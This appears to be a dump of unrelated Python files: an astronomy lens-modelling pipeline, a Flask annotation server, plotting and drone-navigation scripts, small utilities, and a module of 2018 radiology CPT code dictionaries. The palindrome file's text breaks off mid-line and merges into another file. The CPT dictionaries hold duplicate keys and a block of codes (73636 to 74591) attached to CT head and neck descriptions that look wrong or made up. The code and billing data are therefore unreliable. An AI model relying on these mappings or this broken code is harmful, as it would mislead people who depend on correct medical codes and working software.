customize phase names.\n\n This changes the setup folder as follows:\n\n fix_lens_light = False -> setup__\n fix_lens_light = True -> setup___fix_lens_light\n \"\"\"\n if not self.lens_light_bulge_only:\n return \"\"\n elif self.lens_light_bulge_only:\n return \"__\" + conf.instance.tag.get(\"pipeline\", \"bulge_only\", str)\n\n @property\n def shear(self):\n \"\"\"For a SLaM source pipeline, determine the shear model from the no_shear setting.\"\"\"\n if not self.no_shear:\n return ag.mp.ExternalShear\n\n @property\n def is_inversion(self):\n \"\"\"Returns True is the source is an inversion, meaning this SLaM analysis has gone through a source\n inversion pipeline.\"\"\"\n if self.type_tag in \"sersic\":\n return False\n else:\n return True\n\n def align_centre_of_mass_to_light(self, mass, light_centre):\n \"\"\"Align the centre of a mass profile to the centre of a light profile, if the align_light_mass_centre\n SLaM setting is True.\n \n Parameters\n ----------\n mass : ag.mp.MassProfile\n The mass profile whose centre may be aligned with the lens_light_centre attribute.\n light : (float, float)\n The centre of the light profile the mass profile is aligned with.\n \"\"\"\n if self.align_light_mass_centre:\n mass.centre = light_centre\n else:\n mass.centre.centre_0 = af.GaussianPrior(mean=light_centre[0], sigma=0.1)\n mass.centre.centre_1 = af.GaussianPrior(mean=light_centre[1], sigma=0.1)\n return mass\n\n def align_centre_to_lens_light_centre(self, light):\n \"\"\"\n Align the centre of an input light profile to the lens_light_centre of this instance of the SLaM Source\n class, make the centre of the light profile fixed and thus not free parameters that are fitted for.\n\n If the lens_light_centre is not input (and thus None) the light profile centre is unchanged.\n\n Parameters\n ----------\n light : ag.mp.MassProfile\n The light profile whose centre may be aligned with the lens_light_centre attribute.\n \"\"\"\n if self.lens_light_centre is not None:\n light.centre = self.lens_light_centre\n return light\n\n def align_centre_to_lens_mass_centre(self, mass):\n \"\"\"\n Align the centre of an input mass profile to the lens_mass_centre of this instance of the SLaM Source\n class, make the centre of the mass profile fixed and thus not free parameters that are fitted for.\n\n If the lens_mass_centre is not input (and thus None) the mass profile centre is unchanged.\n\n Parameters\n ----------\n mass : ag.mp.MassProfile\n The mass profile whose centre may be aligned with the lens_mass_centre attribute.\n \"\"\"\n if self.lens_mass_centre is not None:\n mass.centre = self.lens_mass_centre\n return mass\n\n def remove_disk_from_lens_galaxy(self, lens):\n \"\"\"Remove the disk from a GalaxyModel, if the SLaM settings specify to mooel the lens's light as bulge-only.\"\"\"\n if self.lens_light_bulge_only:\n lens.disk = None\n return lens\n\n def unfix_lens_mass_centre(self, mass):\n \"\"\"If the centre of a mass model was previously fixed to an input value (e.g. 
lens_mass_centre), unaligned it\n by making its centre GaussianPriors.\n \"\"\"\n\n if self.lens_mass_centre is not None:\n\n mass.centre.centre_0 = af.GaussianPrior(\n mean=self.lens_mass_centre[0], sigma=0.05\n )\n mass.centre.centre_1 = af.GaussianPrior(\n mean=self.lens_mass_centre[1], sigma=0.05\n )\n\n else:\n\n mass.centre.centre_0 = af.last[-1].model.galaxies.lens.mass.centre.centre_0\n mass.centre.centre_1 = af.last[-1].model.galaxies.lens.mass.centre.centre_1\n\n return mass\n\n def unalign_lens_mass_centre_from_light_centre(self, mass):\n \"\"\"If the centre of a mass model was previously aligned with that of the lens light centre, unaligned them\n by using an earlier model of the light.\n \"\"\"\n if self.align_light_mass_centre:\n\n mass.centre = af.last[-3].model.galaxies.lens.bulge.centre\n\n else:\n\n mass.centre = af.last[-1].model.galaxies.lens.mass.centre\n\n return mass\n\n\nclass SLaMLight(setup.SetupPipeline):\n def __init__(\n self,\n align_bulge_disk_centre=False,\n align_bulge_disk_elliptical_comps=False,\n disk_as_sersic=False,\n number_of_gaussians=None,\n ):\n\n super().__init__(\n align_bulge_disk_centre=align_bulge_disk_centre,\n align_bulge_disk_elliptical_comps=align_bulge_disk_elliptical_comps,\n disk_as_sersic=disk_as_sersic,\n number_of_gaussians=number_of_gaussians,\n )\n\n self.type_tag = None\n\n @property\n def tag(self):\n if self.number_of_gaussians is None:\n return (\n conf.instance.tag.get(\"pipeline\", \"light\", str)\n + \"__\"\n + self.type_tag\n + self.align_bulge_disk_tag\n + self.disk_as_sersic_tag\n )\n else:\n return (\n conf.instance.tag.get(\"pipeline\", \"light\", str)\n + \"__\"\n + self.type_tag\n + self.number_of_gaussians_tag\n )\n\n\nclass SLaMMass(setup.SetupPipeline):\n def __init__(\n self,\n no_shear=False,\n fix_lens_light=False,\n constant_mass_to_light_ratio=False,\n bulge_mass_to_light_ratio_gradient=False,\n disk_mass_to_light_ratio_gradient=False,\n align_light_dark_centre=False,\n align_bulge_dark_centre=False,\n include_smbh=False,\n smbh_centre_fixed=True,\n ):\n\n super().__init__(\n no_shear=no_shear,\n constant_mass_to_light_ratio=constant_mass_to_light_ratio,\n bulge_mass_to_light_ratio_gradient=bulge_mass_to_light_ratio_gradient,\n disk_mass_to_light_ratio_gradient=disk_mass_to_light_ratio_gradient,\n align_light_dark_centre=align_light_dark_centre,\n align_bulge_dark_centre=align_bulge_dark_centre,\n include_smbh=include_smbh,\n smbh_centre_fixed=smbh_centre_fixed,\n )\n\n self.disk_as_sersic = None\n self.fix_lens_light = fix_lens_light\n self.type_tag = None\n\n @property\n def tag(self):\n return (\n conf.instance.tag.get(\"pipeline\", \"mass\", str)\n + \"__\"\n + self.type_tag\n + self.no_shear_tag\n + self.align_light_dark_centre_tag\n + self.align_bulge_dark_centre_tag\n + self.include_smbh_tag\n + self.fix_lens_light_tag\n )\n\n @property\n def fix_lens_light_tag(self):\n \"\"\"Generate a tag for if the lens light of the pipeline and / or phase are fixed to a previous estimate,\n or varied during he analysis, to customize phase names.\n\n This changes the setup folder as follows:\n\n fix_lens_light = False -> setup__\n fix_lens_light = True -> setup___fix_lens_light\n \"\"\"\n if not self.fix_lens_light:\n return \"\"\n elif self.fix_lens_light:\n return \"__\" + conf.instance.tag.get(\"pipeline\", \"fix_lens_light\", str)\n\n @property\n def shear_from_previous_pipeline(self):\n \"\"\"Return the shear _PriorModel_ from a previous pipeline, where:\n\n 1) If the shear was included in the *Source* pipeline 
and *no_shear* is *False* in the *Mass* object, it is\n returned using this pipeline result as a model.\n 2) If the shear was not included in the *Source* pipeline and *no_shear* is *False* in the *Mass* object, it is\n returned as a new *ExternalShear* PriorModel.\n 3) If *no_shear* is *True* in the *Mass* object, it is returned as None and omitted from the lens model.\n \"\"\"\n if not self.no_shear:\n if af.last.model.galaxies.lens.shear is not None:\n return af.last.model.galaxies.lens.shear\n else:\n return ag.mp.ExternalShear\n else:\n return None\n","sub_path":"autolens/pipeline/slam.py","file_name":"slam.py","file_ext":"py","file_size_in_byte":22027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"534582035","text":"from flask import *\nimport os\n\n\napp=Flask(__name__,template_folder='templates')\n\n\n@app.route('/')\ndef upload():\n return render_template(\"annotator.html\")\n\n@app.route('/demo')\ndef demo():\n return render_template(\"dragdemo.html\")\n\n@app.route('/save', methods=[\"POST\", \"GET\"])\ndef save_json():\n # POST request\n if request.method == 'POST':\n print('Incoming..')\n print(request.get_json()[\"data\"]) # parse as JSON\n data = request.get_json()[\"data\"]\n print(\"os.getcwd(): \", os.getcwd())\n\n annotationpath = 'static/json/annotations.json'\n\n print(os.path.exists(annotationpath))\n\n try:\n os.remove(annotationpath)\n except Exception as e:\n print(\"An exception occurred: \", e)\n\n with open(annotationpath, 'a') as f:\n f.write(data + '\\n')\n\n return 'OK', 200\n\n# @app.route('/getjson', methods=[\"POST\", \"GET\"])\n# def get_json():\n# return 'OK', 200\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"454381315","text":"#!/usr/bin/env python\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndata = np.loadtxt('10-memory.txt')\n\nplt.subplot(211) # the first subplot in the first figure\nplt.title('System with one Windows vm')\t\t# set the figure title\nplt.plot(data[:,0], 'r-')\nplt.xlabel('Times (min)')\nplt.ylabel('Memory Consumption (MB)')\nplt.axis([0, 120, 450, 750])\nplt.grid(True)\n\nplt.subplot(212) # the second subplot\nplt.plot(data[:,1], 'b-')\nplt.xlabel('Times (min)')\nplt.ylabel('Memory Utilization (%)')\nplt.axis([0, 120, 20.0, 50.0])\nplt.grid(True)\n\n\nplt.show()\n","sub_path":"matplotlib/10/memory-consumption.py","file_name":"memory-consumption.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
{"seq_id":"348654274","text":"import cv2\nimport numpy as np\nfrom sklearn.cluster import KMeans\nfrom matplotlib import pyplot as plt\ndef getTrees(img):# get the coordinates of the tree-stump centers\n HSV = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\n H, S, V = cv2.split(HSV)\n Lower = np.array([15, 7, 180])\n Upper = np.array([20, 22, 215])# pillars\n mask = cv2.inRange(HSV, Lower, Upper)\n points = cv2.bitwise_and(img, img, mask=mask)\n points_gray = cv2.cvtColor(points,cv2.COLOR_BGR2GRAY)\n # erode and dilate to remove noise; because black and white are inverted, erosion and dilation swap roles\n kernel = cv2.getStructuringElement(cv2.MORPH_CROSS, (3, 3))\n points_gray = cv2.dilate(points_gray, kernel, iterations=1)\n points_gray = cv2.erode(points_gray, kernel, iterations=4)\n points_gray = cv2.dilate(points_gray, kernel, iterations=3)\n 
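 # aside (hypothetical, not part of the original file): an erode-then-dilate
 # pair is what OpenCV calls "opening"; the same cleanup could be condensed
 # into the compound morphology call, e.g.
 # points_gray = cv2.morphologyEx(points_gray, cv2.MORPH_OPEN, kernel)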
re,points1=cv2.threshold(points_gray,50,255,cv2.THRESH_BINARY_INV)#points1为二值图像 (points1[x][y] x不超过480 y不超过940)\n #x轴正半轴为下,y轴正半轴为右\n #cv2.imshow('1',points1)\n #cv2.waitKey(0)\n #cv2.destroyAllWindows()\n height = points1.shape[0]#480\n width = points1.shape[1]#640\n dot= []\n\n for raw in range(height):\n for col in range(width):\n if(points1[raw][col]==0):#黑色的是柱子\n #print(' x = '+str(raw)+' y = '+str(col))\n dot.append([raw,col])#黑色点的图像\n dot=np.array(dot)#shape (2872,2)\n #print(dot)\n x=dot[:,1]#横坐标 最大640\n y=dot[:,0]#纵坐标 最大480\n y=480-y\n #plt.scatter(x,y)#打印所有点的位置\n #plt.show()\n dot=np.array(dot)\n\n estimator = KMeans(n_clusters=15)#构造聚类器\n estimator.fit(dot)#聚类\n label_pred = estimator.labels_ #获取聚类标签\n centroids = estimator.cluster_centers_ #获取聚类中心\n inertia = estimator.inertia_ # 获取聚类准则的总和\n centroids[:,0]=480-centroids[:,0]\n #print(centroids)\n centroids=centroids[np.lexsort(centroids[:,:-1].T)]\n x_cen=centroids[:,1]\n y_cen=centroids[:,0]\n #y=480-y\n plt.scatter(x_cen,y_cen)\n plt.show()\n\n return centroids\n\nimg=cv2.imread('/Users/tongbohan/Desktop/images/img_3_0_1562030342490023600.png')\n#print(getTrees(img))\na = getTrees(img)\na[[0, 1], :] = a[[1, 0], :] # 实现了第i行与第j行的互换\n#print(a)\npath = a/100\n#print(path)\ndef flyByVector(vector):#传入一个移动向量\n x = vector[0]\n y = vector[1]\n if x>0:#如果大于0向前或者向右\n uav.flyCmd('forward','fast')\n time.sleep(x)\n #这里的sleep参数不确定,需要测试得到结果,即移动的时间和像素之间的关系\n elif x<0:\n uav.flyCmd('backward','fast')\n time.sleep(-x)\n else:uav.flyCmd('stop')\n\n if y>0:\n uav.flyCmd('moveright','fast')\n time.sleep(y)\n #这里的sleep参数不确定\n elif y<0:\n uav.flyCmd('moveleft','fast')\n time.sleep(-y)\n else:uav.flyCmd('stop')\n\n\nfor num in range(path.shape[0]):\n print('now going to tree : '+str(num+1))\n flyByVector(path[num])\n","sub_path":"app/vision/scratch_2.py","file_name":"scratch_2.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"515543922","text":"# Given a string, considering only alphanumeric chars and ignoring cases, check if string is palindrome \n\nimport string \n\n# Better Solution b/c only requires linear time, and not linear space\ndef is_palindrome(s):\n # Iterator i will move from front to back \n # Iterator j will move from back to from \n i = 0 # start of string \n j = len(s) -1 # start at back of string\n\n while i < j:\n while not s[i].isalnum() and i 1000:\n return True\n else:\n return False\n","sub_path":"Python/PythonC++Scala/script/tag/dfhspider/wangwang.py","file_name":"wangwang.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"158586562","text":"import datetime\nimport time\nfrom functools import wraps\nfrom wsgiref.handlers import format_date_time\nfrom flask import make_response\n\n\ndef cache(expires=None, round_to_minute=False):\n \"\"\"\n Add Flask cache response headers based on expires in seconds.\n \n If expires is None, caching will be disabled.\n Otherwise, caching headers are set to expire in now + expires seconds\n\n If round_to_minute is True, then it will always expire at the start of a minute (seconds = 0)\n \n Example usage:\n \n @app.route('/map')\n @cache(expires=60)\n def index():\n return render_template('index.html')\n \n \"\"\"\n def cache_decorator(view):\n @wraps(view)\n def cache_func(*args, **kwargs):\n now = datetime.datetime.now()\n \n response = make_response(view(*args, **kwargs))\n 
response.headers['Last-Modified'] = format_date_time(time.mktime(now.timetuple()))\n \n if expires is None:\n response.headers['Cache-Control'] = 'no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0'\n response.headers['Expires'] = '-1'\n else:\n expires_time = now + datetime.timedelta(seconds=expires)\n\n if round_to_minute:\n expires_time = expires_time.replace(second=0, microsecond=0)\n\n response.headers['Cache-Control'] = 'public'\n response.headers['Expires'] = format_date_time(time.mktime(expires_time.timetuple()))\n \n return response\n return cache_func\n return cache_decorator","sub_path":"all-gists/954da3acec84606885f5/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":1605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"222657786","text":"import os\n\n\ndef get_current_path(current_file):\n return os.path.abspath(os.path.dirname(current_file))\n\n\nfrom math import radians, cos, sin, asin, sqrt\n\n\ndef calculate_distance(lhs_longitude, lhs_latitude, rhs_longitude, rhs_latitude): # 经度1,纬度1,经度2,纬度2 (十进制度数)\n \"\"\"\n Calculate the great circle distance between two points\n on the earth (specified in decimal degrees)\n \"\"\"\n # 将十进制度数转化为弧度\n lhs_longitude, lhs_latitude, rhs_longitude, rhs_latitude = \\\n map(radians, [lhs_longitude, lhs_latitude, rhs_longitude, rhs_latitude])\n\n # haversine公式\n dlon = rhs_longitude - lhs_longitude\n dlat = rhs_latitude - lhs_latitude\n a = sin(dlat / 2) ** 2 + cos(lhs_latitude) * cos(rhs_latitude) * sin(dlon / 2) ** 2\n c = 2 * asin(sqrt(a))\n r = 6371 # 地球平均半径,单位为公里\n return c * r * 1000\n","sub_path":"utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"52043881","text":"#\n## sam_2018_cpt_rad library module\n## Description: Contains dictionaries of 2018 CPT codes and descriptions for radiology modalities and search functions.\n## These codes were taken from \"http://www.mainstreetradiology.com/common/pages/UserFile.aspx%3FfileId%3D895629\"\n## The CPT codes are for the following modalities; CT, FLUORO, MAMMO, MRI, NUCLEAR, PET, US, XRAY \n## Disclaimer: I noticed typos in some of the definitions for s few of the CPT codes but intentionally did not correct them\n##\n## v1.0 sdomingo 2019 .Inital version\n#\n## Dictionary names are; RAD_CPT_CT_dict, RAD_CPT_FLUORO_dict, RAD_CPT_MAMO_dict, RAD_CPT_MRI_dict, \n## RAD_CPT_NUCLEAR_dict, RAD_CPT_PET_dict, RAD_CPT_US_dict, RAD_CPT_XRAY_dict, \n## CT Dictionary\nRAD_CPT_CT_dict = { '70450': 'CT BRAIN without contrast', \n '70460': 'CT BRAIN with contrast', \n '70470': 'CT BRAIN w/o & with contrast',\n '70480': 'CT ORBIT/SKULL without contrast',\n '70481': 'CT ORBITS/SKULL with contrast',\n '70482': 'CT ORBIT/SKULL w/o & with contrast',\n '70486': 'CT MAXILLOFACIAL without contrast',\n '70488': 'CT FACE w/o & with contrast',\n '70490': 'CT NECK SOFT TISSUE without contrast',\n '70491': 'CT NECT SOFT TISSUE with contrast',\n '70492': 'CT NECK SOFT TISSUE w/o & with contrast',\n '70496': 'CT ANGIO HEAD with and/or w/o contrast',\n '70498': 'CT ANGIO/NECK with and/or w/o contrast',\n '71250': 'CT CHEST without contrast',\n '71260': 'CT CHEST with contrast',\n '71270': 'CT CHEST w/o & with contrast',\n '71275': 'CT ANGIOGRAPHY/CHEST with and/or w/o contrast',\n '72125': 'CT CERVICAL SPINE without contrast',\n '72126': 'CT CERVICAL SPINE with contrast',\n '72127': 'CT 
CERVICAL SPINE w/o & with contrast',\n '72128': 'CT THORACIC SPINE without contrast',\n '72129': 'CT THORACIC SPINE with contrast',\n '72130': 'CT THORACIC SPINE w/o & with contrast',\n '72131': 'CT LUMBAR SPINE without contrast',\n '72132': 'CT LUMBAR SPINE with contrast',\n '72133': 'CT LUMBAR SPINE w/o & with contrast',\n '72191': 'CT ANGIO PELVIS with and/or w/o contrast',\n '72192': 'CT PELVIS without contrast',\n '72193': 'CT PELVIS with contrast',\n '72194': 'CT PELVIS w/o & with contrast',\n '73200': 'CT UPPER EXTREMITY without contrast',\n '73201': 'CT UPPER EXTREMITY with contrast',\n '73202': 'CT UPPER EXTREMITY w/o & with contrast',\n '73206': 'CT ANGIO UPPER EXTREM with and/or w/o contrast',\n '73700': 'CT LOWER EXTREMITY without contrast',\n '73701': 'CT LOWER EXTREMITY with contrast',\n '73702': 'CT LOWER EXTREMITY w/o & with contrast',\n '73706': 'CT ANGIO LOWER EXT with and/or w/o contrast',\n '74150': 'CT ABDOMEN w/o contrast',\n '74160': 'CT ABDOMEN with contrast',\n '74170': 'CT ABDOMEN w/o & with contrast',\n '74174': 'CT ANGIO ABD & PELVIS contrast with & w/o contrast',\n '74175': 'CT ANGIO ABD with contrast/noncontrast',\n '74176': 'CT ABDOMEN & PELVIS w/o contrast',\n '74177': 'CT ABDOMEN & PELVIS with contrast',\n '74178': 'CT ABDOMEN & PELVIS w/o contrast 1/>body re',\n '74261': 'CT ABDOMEN w/o contrast',\n '74262': 'CT ABDOMEN w/o contrast',\n '74263': 'CT ABDOMEN w/o contrast',\n '73636': 'CT BRAIN w/o contrast',\n '73731': 'CT BRAIN with contrast',\n '73827': 'CT BRAIN w/o & with contrast',\n '73922': 'CT ORBIT/SKULL without contrast',\n '74018': 'CT ORBITS/SKULL with contrast',\n '74113': 'CT ORBIT/SKULL w/o & with contrast',\n '74209': 'CT MAXILLOFACIAL without contrast',\n '74304': 'CT FACE with contrast',\n '74400': 'CT FACE w/o & with contrast',\n '74495': 'CT NECK SOFT TISSUE without contrast',\n '74591': 'CT NECT SOFT TISSUE with contrast'}\n## FLUORO Dictionary\nRAD_CPT_FLUORO_dict = { '74210': 'FLUORO Upper Esophagram',\n '74220': 'FLUORO ESOPHAGUS EXAM',\n '74241': 'FLUORO UPPER GI SERIES',\n '74247': 'FLUORO UPPER GI TRACT WITH AIR',\n '74249': 'FLUORO UGI & SB WITH AIR',\n '74250': 'FLUORO SMALL BOWEL SERIES',\n '74270': 'FLUORO BARIUM ENEMA',\n '74280': 'FLUORO BARIUM ENEMA W/AIR CONT',\n '74400': 'FLUORO IVP'}\n## MAMMO Dictionary\nRAD_CPT_MAMO_dict = {'77063': 'MAMMOGRAPHY 3D DIGITAL SCREENING', \n '77065': 'MAMMOGRAPHY-Diagnostic UNILATERAL',\n '77066': 'MAMMOGRAPHY-Diagnostic- BILATERAL',\n '77067': 'MAMMOGRAPHY SCREENING'}\n## MRI Dictionary\nRAD_CPT_MRI_dict = {'70336': 'MRI TEMPOROMANDIBULAR JOI', \n '70540': 'MRI SOFT TISSUE NECK,ORBIT without contrast',\n '70542': 'MRI SOFT TISSUE NECK,ORBIT with contrast',\n '70543': 'MRI NECK,ORBIT w/o & with contrast',\n '70544': 'MRA HEAD without contrast',\n '70545': 'MRA HEAD with contrast',\n '70546': 'MRA HEAD w/o & with contrast',\n '70547': 'MRA NECK without contrast',\n '70548': 'MRA NECK/CAROTID with contrast',\n '70549': 'MRA/NECK w/o & with contrast',\n '70551': 'MRI BRAIN without contrast',\n '70552': 'MRI BRAIN with contrast',\n '70553': 'MRI BRAIN w/o & with contrast',\n '71550': 'MRI CHEST without contrast',\n '71551': 'MRI CHEST with contrast',\n '71552': 'MRI CHEST w/o & with contrast',\n '71555': 'MRA CHEST',\n '72141': 'MRI CERV.SPINE without contrast',\n '72142': 'MRI CERV SPINE with contrast',\n '72146': 'MRI THORACIC without contrast',\n '72147': 'MRI THORACIC with contrast',\n '72148': 'MRI LUMBAR SPINE without contrast / MRI LUMBAR PLEXUS',\n '72149': 'MRI LUMBAR SPINE with 
contrast',\n '72156': 'MRI/CERV SPINE w/o & with contrast',\n '72157': 'MRI THORACIC w/o & with contrast',\n '72158': 'MRI LUMBAR SPINE w/o & with contrast',\n '72159': 'MRI SPINE Angiography',\n '72195': 'MRI PELVIS without contrast',\n '72196': 'MRI PELVIS with contrast',\n '72197': 'MRI PELVIS w/o & with contrast',\n '72198': 'MRA PELVIS',\n '73218': 'MRI UPPER EXT. NON JOINT without contrast',\n '72197': 'MRI PELVIS w/o & with contrast',\n '72198': 'MRA PELVIS',\n '73218': 'MRI UPPER EXT. NON JOINT without contrast',\n '73219': 'MRI UPPER EXT. NON JOINT with contrast',\n '73220': 'MRI UPPER EXT NON JOINT w/o & with contrast',\n '73221': 'MRI UPPER EXT. JOINT without contrast',\n '73222': 'MRI UPPER EXT JOINT with contrast',\n '73223': 'MRI UPPER JOINT w/o & with contrast',\n '73225': 'MRA UPPER EXTREMITY',\n '73718': 'MRI LOWER EXT without contrast',\n '73719': 'MRI LOWER EXT with contrast',\n '73720': 'MRI LOWER EX. w/o & with contrast',\n '73721': 'MRI LOWER EXT JOINT without contrast',\n '73722': 'MRI LOWER EXT JOINT with contrast',\n '73723': 'MRI/JOINT LOW EXTREMITY w/o & with contrast',\n '73725': 'MRA.ANGIO,LOWER EXTREMITY',\n '74181': 'MRI ABDOMEN without contrast',\n '74182': 'MRI/ABDOMEN with contrast',\n '74183': 'MRI ABD. w/o & with contr',\n '74185': 'MRA ABDOMEN',\n '77058': 'MRI BREAST UNILATERAL',\n '77059': 'MRI BREAST BILATERAL'}\n## NUCLEAR Dictionary\nRAD_CPT_NUCLEAR_dict = {'78012':'NUCLEAR EXAM THYROID (UPTAKE only)', \n '78012':'NUCLEAR EXAM THYROID (UPTAKE only)',\n '78014':'NUCLEAR EXAM THYROID (WITH UPTAKE)',\n '78013':'NUCLEAR EXAM THYROID (WITH IMAGING ONLY)',\n '78070':'NUCLEAR EXAM PARATHYROID SCAN',\n '78071':'NUCLEAR EXAM PARATHYROID SCAN with SPECT',\n '78206':'NUCLEAR LIVER SCAN SPECT(HEMANGIOMA)',\n '78215':'NUCLEAR LIVER/SPLEEN SCAN static',\n '78226':'NUCLEAR HEPATOBILIARY SCAN',\n '78227':'NUCLEAR HEPATOBILIARY SCAN WITH PHARM',\n '78290':'NUCLEAR MECKELS SCAN',\n '78306':'NUCLEAR BONE SCAN WHOLE BODY',\n '78315':'NUCLEAR BONE SCAN 3 PHASE',\n '78320':'NUCLEAR BONE SCAN SPECT',\n '78452':'MyoCardial Perfusion Imaging/Exercise with 93015',\n '78452':'MyoCardial Perfusion Imaging/Pharmacologic with 93015',\n '78472':'NUCLEAR MUGA SCAN CARDIA IMAGING',\n '78607':'NUCLEAR Brain Spect (DaTscan)',\n '78707':'NUCLEAR RENAL SCAN WITH MAG 3',\n '78708':'NUCLEAR RENAL SCAN WITH LASIX OR CAPTOPRIL',\n '78800':'NUCLEAR GALLIUM SCAN with 78803',\n '78804':'NUCLEAR OCTREO SCAN with 78803',\n '78807':'NUCLEAR SCAN FOR INFLAMATION with spect'}\n## PET Dictionary\nRAD_CPT_PET_dict = {'78608': 'PET BRAIN IMAG', \n '78814': 'PET SCAN WITH CT Limited',\n '78815': 'PET SCANN with CT Skull to mid thigh',\n '78816': 'PET SCAN with CT full body'}\n## US Dictionary\nRAD_CPT_US_dict = { '76506': 'U/S EXAM OF HEAD', \n '76536': 'U/S Soft Tissue Neck(thyroid,parathyroid,etc.)',\n '76604': 'U/S CHEST',\n '76641': 'U/S BREAST(uni or bi)',\n '76700': 'U/S ABDOMEN COMPLETE',\n '76705': 'U/S ABDOMEN(limited)',\n '76770': 'U/S RETRO(renal,aorta,nodes)',\n '76775': 'U/S RETRO-limited',\n '76776': 'U/S TRANSPLANTED KIDNEY',\n '76800': 'U/S ECHO EXAM SPINAL CANAL',\n '76801': 'U/S OB FIRST TRIMESTER',\n '76802': 'U/S OB/FIRST TRI/EACH ADD',\n '76805': 'U/S OB-GYN > 14 WEEKS',\n '76810': 'U/S OB > 14 WEEKS/EACH ADD',\n '76811': 'U/S OB MATERN/EVAL&DET EX',\n '76812': 'U/S OB MATERN/EVAL&DET EX/EACH ADD',\n '76813': 'U/S NUCHAL TRANSLUCENCY',\n '76814': 'U/S Nuchal Translucency/EACH ADD',\n '76815': 'U/S OB LIMITED',\n '76816': 'U/S OB LIMITED FOLLOW UP',\n '76817': 'U/S OB TRANSVAG',\n 
'76830': 'U/S TRANSVAGINAL',\n '76831': 'U/S HYSTEROGRAM WITH DOPPLER',\n '76856': 'U/S PELVIS-NON OB',\n '76857': 'U/S PELVIS-NON OB LIMITED',\n '76870': 'U/S SCROTUM',\n '76870': 'U/S SCROTUM with Doppler 93975',\n '76881': 'U/S EXTREMITY NON VASCULAR',\n '76882': 'U/S EXTREMITY NON VASCULAR LIMITED',\n '93880': 'U/S CAROTID DOPPLER/DUPLEX',\n '93926': 'U/S DUPLEX SCAN LOW EXT ARTERY r/o pseudo',\n '93970': 'U/S VENOUS DUPLEX/EXTREMITY',\n '93971': 'U/S VENOUS DUPLEX/EXTRM/UNILA',\n '93975': 'U/S DOPPLER,ABDOMINAL/PELVIC',\n '93976': 'U/S LIMITED STUDY DUPLEX SCAN',\n '93990': 'U/S DUPLEX SCAN OF HEMODIALYS'}\n## XRAY Dictionary\nRAD_CPT_XRAY_dict = {'70030': 'X-RAY EYE FOR FOREIGN BOD',\n '70100': 'XRAY MANDIBLE < 4 VIEWS',\n '70110': 'X-RAY EXAM OF MANDIBLE 4 VIEWS',\n '70140': 'XRAY FACIAL BONES < 3VIEWS',\n '70150': 'X-RAY FACIAL BONES 3VIEWS',\n '70160': 'XRAY NASAL BONES 3 VIEWS+',\n '70210': 'XRAY SINUSES < 3 VIEWS',\n '70220': 'XRAY SINUSES 3 OR MORE VIEWS',\n '70250': 'XRAY SKULL < 4 VIEWS',\n '70260': 'XRAY SKULL 4VIEWS',\n '70360': 'XRAY NECK SOFT TISSUE',\n '71010': 'XRAY CHEST, ONE VIEW',\n '71020': 'XRAY CHEST, TWO VIEWS',\n '71021': 'XRAY CHEST W/APICAL LORDO',\n '71022': 'XRAY CHEST W/OBLIQUE PROJEC',\n '71023': 'XRAY CHEST W/FLUORO',\n '71030': 'XRAY CHEST 4 VIEWS',\n '71034': 'XRAY CHEST 4 VIEWS W/FLUOROS.',\n '71035': 'XRAY CHEST LATERAL DECUBITUS',\n '71100': 'XRAY RIBS,UNILAT.,TWO VIEWS',\n '71101': 'XRAY RIBS INCL CHEST 3 VI',\n '71110': 'XRAY RIB BILAT 3 VIEWS',\n '71111': 'XRAY RIBS BILATERAL INCL CHEST 4 VI',\n '71120': 'XRAY STERNUM 2 VIEWS',\n '71130': 'XRAY STERNO CLAVI JOINT 3 VIEWS',\n '72010': 'XRAY SPINE, ENTIRE AP & LAT',\n '72020': 'XRAY SPINE ONE VIEW',\n '72040': 'XRAY CERVICAL SPINE < 4 VIEWS',\n '72050': 'XRAY CERVICAL SPINE 4 or 5 VIEWS',\n '72052': 'XRAY SPINE CERV INCL OBLI 6VIEWS',\n '72069': 'XRAY SPINE THORACOLUMBAR SCOLIOSIS',\n '72070': 'XRAY THORACIC SPINE 2 VIEWS',\n '72072': 'XRAY SPINE THORACIC 3 VIE',\n '72074': 'XRAY SPINE THORACIC 4 VIE',\n '72080': 'XRAY SPINE THORACOLUMBAR',\n '72090': 'XRAY SCOLIOSIS STUDY ERECT & SUPINE',\n '72100': 'XRAY LUMBAR SPINE < 4 VIEWS',\n '72110': 'XRAY LUMBAR SPINE 4 VIEWS',\n '72114': 'X-RAY LUMBAR SPINE 6 VIEWS',\n '72120': 'X-RAY LUMBAR SPINE <4 VIEW',\n '72170': 'XRAY PELVIS 1 OR 2 VIEWS',\n '72190': 'XRAY PELVIS 3 VIEWS',\n '72200': 'XRAY SACROILIAC JOINTS < 3 VIEWS',\n '72202': 'XRAY SACROILIAC JOINTS 3VIEW',\n '72220': 'XRAY COCCYX/SACRUM 2VIEWS',\n '73000': 'XRAY CLAVICLE',\n '73010': 'XRAY SCAPULA, COMPLETE',\n '73020': 'XRAY SHOULDER MIN 1 VIEWS',\n '73030': 'XRAY SHOULDER 2 VIEWS',\n '73040': 'XRAY SHOULDER ARTHROGRAPHY',\n '73050': 'X-RAY ACOMIOCLAVICULAR JOINTS',\n '73060': 'XRAY HUMERUS 2 VIEWS',\n '73070': 'XRAY ELBOW TWO VIEWS',\n '73080': 'XRAY ELBOW THREE VIEWS',\n '73085': 'XRAY ELBOW ARTHROGRAPHY',\n '73090': 'XRAY FOREARM TWO VIEWS',\n '73092': 'X-RAY EXAM OF ARM, INFANT',\n '73100': 